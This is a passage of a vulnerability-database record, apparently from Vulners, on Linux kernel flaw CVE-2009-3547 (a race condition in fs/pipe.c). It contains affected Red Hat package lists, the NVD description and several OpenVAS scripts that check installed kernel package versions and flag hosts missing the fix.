"ORACLEVM_OVMSA-2009-0033.NASL", "SUSE9_12541.NASL", "SUSE_11_1_KERNEL-091123.NASL"]}, {"type": "seebug", "idList": ["SSV:12576", "SSV:12593"]}, {"type": "exploitdb", "idList": ["EDB-ID:33322", "EDB-ID:40812", "EDB-ID:10018", "EDB-ID:33321", "EDB-ID:9844"]}, {"type": "oraclelinux", "idList": ["ELSA-2009-1541", "ELSA-2009-1548", "ELSA-2009-1550"]}, {"type": "redhat", "idList": ["RHSA-2009:1541", "RHSA-2009:1587", "RHSA-2009:1672", "RHSA-2009:1548", "RHSA-2009:1550", "RHSA-2009:1540"]}, {"type": "threatpost", "idList": ["THREATPOST:9B247D64D74F86C01215CC8DF7D85698"]}, {"type": "zdt", "idList": ["1337DAY-ID-26409"]}, {"type": "centos", "idList": ["CESA-2009:1541", "CESA-2009:1548", "CESA-2009:1550"]}, {"type": "canvas", "idList": ["FS_PIPE_RACE_TO_NULL"]}, {"type": "suse", "idList": ["SUSE-SA:2009:055", "SUSE-SA:2009:060", "SUSE-SA:2009:056", "SUSE-SA:2009:054"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1927-1:8E712", "DEBIAN:DSA-1929-1:8AEEF"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22752"]}, {"type": "vmware", "idList": ["VMSA-2010-0010"]}], "modified": "2019-08-13T18:46:00"}, "vulnersScore": 6.7}, "objectVersion": "1.4", "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "arch": "ia64", "packageName": "kernel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-2.6.9-78.0.28.EL.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "s390x", "packageName": "kernel-devel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "i686", "packageName": "kernel-hugemem-devel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-hugemem-devel-2.6.9-78.0.28.EL.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "x86_64", "packageName": "kernel-xenU-devel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-xenU-devel-2.6.9-78.0.28.EL.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "ia64", "packageName": "kernel-largesmp", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-largesmp-2.6.9-78.0.28.EL.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "i686", "packageName": "kernel-xenU", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-xenU-2.6.9-78.0.28.EL.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "s390", "packageName": "kernel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-2.6.9-78.0.28.EL.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "ppc64", "packageName": "kernel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-2.6.9-78.0.28.EL.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "x86_64", "packageName": "kernel-largesmp-devel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-largesmp-devel-2.6.9-78.0.28.EL.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "ppc64iseries", "packageName": "kernel-devel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.ppc64iseries.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "x86_64", "packageName": "kernel-largesmp", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-largesmp-2.6.9-78.0.28.EL.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "i686", "packageName": "kernel-xenU-devel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-xenU-devel-2.6.9-78.0.28.EL.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "i686", "packageName": "kernel-smp-devel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-smp-devel-2.6.9-78.0.28.EL.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "noarch", "packageName": "kernel-doc", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-doc-2.6.9-78.0.28.EL.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "s390x", "packageName": "kernel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-2.6.9-78.0.28.EL.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "ppc64", "packageName": "kernel-largesmp", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-largesmp-2.6.9-78.0.28.EL.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "ppc64iseries", "packageName": "kernel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-2.6.9-78.0.28.EL.ppc64iseries.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "x86_64", "packageName": "kernel-xenU", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-xenU-2.6.9-78.0.28.EL.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "s390", "packageName": "kernel-devel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "i686", "packageName": "kernel-hugemem", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-hugemem-2.6.9-78.0.28.EL.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "i686", "packageName": "kernel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-2.6.9-78.0.28.EL.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "ia64", "packageName": "kernel-devel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "ia64", "packageName": "kernel-largesmp-devel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-largesmp-devel-2.6.9-78.0.28.EL.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "x86_64", "packageName": "kernel-smp", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-smp-2.6.9-78.0.28.EL.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "ppc64", "packageName": "kernel-largesmp-devel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-largesmp-devel-2.6.9-78.0.28.EL.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "x86_64", "packageName": "kernel-devel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "x86_64", "packageName": "kernel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-2.6.9-78.0.28.EL.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "i686", "packageName": "kernel-devel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "i686", "packageName": "kernel-smp", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-smp-2.6.9-78.0.28.EL.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "ppc64", "packageName": "kernel-devel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-devel-2.6.9-78.0.28.EL.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "x86_64", "packageName": "kernel-smp-devel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-smp-devel-2.6.9-78.0.28.EL.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "src", "packageName": "kernel", "packageVersion": "2.6.9-78.0.28.EL", "packageFilename": "kernel-2.6.9-78.0.28.EL.src.rpm", "operator": "lt"}], "_object_type": "robots.models.redhat.RedHatBulletin", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:10:00", "bulletinFamily": "NVD", "description": "Multiple race conditions in fs/pipe.c in the Linux kernel before 2.6.32-rc6 allow local users to cause a denial of service (NULL pointer dereference and system crash) or gain privileges by attempting to open an anonymous pipe via a /proc/*/fd/ pathname.", "modified": "2018-10-10T19:43:00", "id": "CVE-2009-3547", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3547", "published": "2009-11-04T15:30:00", "title": "CVE-2009-3547", "type": "cve", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2018-04-06T11:38:49", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1541.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\npipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\nbe released by other processes before it is used to update the pipe's\nreader and writer counters. This could lead to a local denial of service or\nprivilege escalation. (CVE-2009-3547, Important)\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct these issues. The system must be rebooted for this update\nto take effect.", "modified": "2018-04-06T00:00:00", "published": "2009-11-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066175", "id": "OPENVAS:136141256231066175", "title": "RedHat Security Advisory RHSA-2009:1541", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1541.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1541 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1541.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\npipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\nbe released by other processes before it is used to update the pipe's\nreader and writer counters. This could lead to a local denial of service or\nprivilege escalation. (CVE-2009-3547, Important)\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct these issues. The system must be rebooted for this update\nto take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66175\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-3547\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1541\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1541.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#important\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-hugemem\", rpm:\"kernel-hugemem~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-hugemem-devel\", rpm:\"kernel-hugemem-devel~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-largesmp\", rpm:\"kernel-largesmp~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-largesmp-devel\", rpm:\"kernel-largesmp-devel~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:36", "bulletinFamily": "scanner", "description": "The remote host is missing updates to kernel announced in\nadvisory CESA-2009:1541.", "modified": "2018-04-06T00:00:00", "published": "2009-11-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066218", "id": "OPENVAS:136141256231066218", "type": "openvas", "title": "CentOS Security Advisory CESA-2009:1541 (kernel)", "sourceData": "#CESA-2009:1541 66218 2\n# $Id: ovcesa2009_1541.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:1541 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:1541\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:1541\nhttps://rhn.redhat.com/errata/RHSA-2009-1541.html\";\ntag_summary = \"The remote host is missing updates to kernel announced in\nadvisory CESA-2009:1541.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66218\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-3547\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Security Advisory CESA-2009:1541 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-hugemem\", rpm:\"kernel-hugemem~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-hugemem-devel\", rpm:\"kernel-hugemem-devel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-largesmp\", rpm:\"kernel-largesmp~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-largesmp-devel\", rpm:\"kernel-largesmp-devel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:57:13", "bulletinFamily": "scanner", "description": "The remote host is missing updates to kernel announced in\nadvisory CESA-2009:1541.", "modified": "2017-07-10T00:00:00", "published": "2009-11-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66218", "id": "OPENVAS:66218", "title": "CentOS Security Advisory CESA-2009:1541 (kernel)", "type": "openvas", "sourceData": "#CESA-2009:1541 66218 2\n# $Id: ovcesa2009_1541.nasl 6650 2017-07-10 11:43:12Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:1541 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:1541\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:1541\nhttps://rhn.redhat.com/errata/RHSA-2009-1541.html\";\ntag_summary = \"The remote host is missing updates to kernel announced in\nadvisory CESA-2009:1541.\";\n\n\n\nif(description)\n{\n script_id(66218);\n script_version(\"$Revision: 6650 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:43:12 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-3547\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Security Advisory CESA-2009:1541 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-hugemem\", rpm:\"kernel-hugemem~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-hugemem-devel\", rpm:\"kernel-hugemem-devel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-largesmp\", rpm:\"kernel-largesmp~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-largesmp-devel\", rpm:\"kernel-largesmp-devel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:55", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:1361412562310880808", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880808", "title": "CentOS Update for kernel CESA-2009:1541 centos4 i386", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2009:1541 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2009-November/016302.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880808\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2009:1541\");\n script_cve_id(\"CVE-2009-3547\");\n script_name(\"CentOS Update for kernel CESA-2009:1541 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 4\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n This update fixes the following security issues:\n\n * a NULL pointer dereference flaw was found in each of the following\n functions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\n pipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\n be released by other processes before it is used to update the pipe's\n reader and writer counters. This could lead to a local denial of service or\n privilege escalation. (CVE-2009-3547, Important)\n\n Users should upgrade to these updated packages, which contain a backported\n patch to correct these issues. The system must be rebooted for this update\n to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 